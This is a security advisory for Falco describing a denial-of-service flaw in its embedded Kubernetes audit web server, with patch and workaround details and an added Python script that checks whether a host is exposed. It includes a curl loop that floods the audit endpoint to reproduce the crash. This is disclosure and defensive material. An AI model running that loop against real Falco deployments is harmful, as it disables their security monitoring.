Impact
What kind of vulnerability is it? Who is impacted?
This vulnerability allows external actors to shut down Falco.
Anyone running Falco is impacted.
To reproduce the issue, continuously send requests towards the Kubernetes audit endpoint.
Example:
    # Keep POSTing a sample Kubernetes audit event to the embedded web server
    while true; do \
      curl http://127.0.0.1:8765/k8s-audit \
        --data '{"kind":"Event","apiVersion":"audit.k8s.io/v1beta1","metadata":{"creationTimestamp":"2018-10-25T13:58:49Z"},"level":"Request","timestamp":"2018-10-25T13:58:49Z","auditID":"841d3e6d-90d2-43df-8da4-684738bee3d5","stage":"ResponseComplete","requestURI":"/api/v1/namespaces","verb":"create","user":{"username":"system:anonymous","groups":["system:masters","system:authenticated"]},"sourceIPs":["192.168.99.1"],"objectRef":{"resource":"namespaces","name":"foo","apiVersion":"v1"},"responseStatus":{"metadata":{},"code":201},"requestObject":{"kind":"Namespace","apiVersion":"v1","metadata":{"name":"foo","creationTimestamp":null},"spec":{},"status":{"phase":"Active"}},"requestReceivedTimestamp":"2018-10-25T13:58:49.730588Z","stageTimestamp":"2018-10-25T13:58:49.736141Z","annotations":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":""}}' \
        -H "Content-Type: application/json"; \
    done
Patches
Has the problem been patched? What versions should users upgrade to?
The problem has been addressed by #867 on Sep 30, 2019.
Users should upgrade to version 0.18.0 or later.
Workarounds
Is there a way for users to fix or remediate the vulnerability without upgrading?
Users who don't need to detect Kubernetes Audit Events can disable the embedded web server from the Falco configuration.
If users cannot disable the Kubernetes Audit web server, there is no workaround, since the Lua state is not thread-safe by design.
An upgrade to a Falco version greater than 0.18.0 is necessary and strongly recommended.
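The following exposure check is an added example and not part of the advisory or of the Falco project: a host is considered exposed when it runs a Falco release below 0.18.0 (the first fixed version named above) with the embedded web server enabled. The falco.yaml layout (a top-level `webserver:` block with an `enabled:` key), the `falco --version` output format and the treatment of a missing key as "disabled" are assumptions about the deployment.

```python
import re

FIXED_VERSION = (0, 18, 0)  # first release named as fixed in the advisory

def parse_version(text):
    """Extract the first dotted x.y.z version from text such as
    'Falco version: 0.17.0' (output format is an assumption)."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("no version found in %r" % text)
    return tuple(int(x) for x in m.groups())

def webserver_enabled(falco_yaml):
    """Return True when the top-level `webserver:` block has `enabled: true`.
    Minimal parser for that one block: strips comments, follows indented keys.
    A missing block or key is treated as disabled (an assumption)."""
    in_block = False
    for raw in falco_yaml.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if not line.strip():
            continue
        if not line.startswith((" ", "\t")):
            in_block = line.strip() == "webserver:"  # new top-level key
            continue
        if in_block:
            key, _, value = line.strip().partition(":")
            if key == "enabled":
                return value.strip().lower() == "true"
    return False

def is_exposed(version_text, falco_yaml):
    """Exposed only if the binary is unpatched AND the audit endpoint is served."""
    return parse_version(version_text) < FIXED_VERSION and webserver_enabled(falco_yaml)

# Constructed sample configurations (not taken from a real deployment)
VULNERABLE_YAML = """
webserver:
  enabled: true
  listen_port: 8765
  k8s_audit_endpoint: /k8s-audit
"""
HARDENED_YAML = """
webserver:
  enabled: false  # workaround from the advisory: endpoint no longer reachable
"""

if __name__ == "__main__":
    print("0.17.0 + default config exposed:", is_exposed("Falco version: 0.17.0", VULNERABLE_YAML))
    print("0.17.0 + webserver off exposed:", is_exposed("Falco version: 0.17.0", HARDENED_YAML))
```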
References
Are there any links users can visit to find out more?
NONE.
For more information
If you have any questions or comments about this advisory: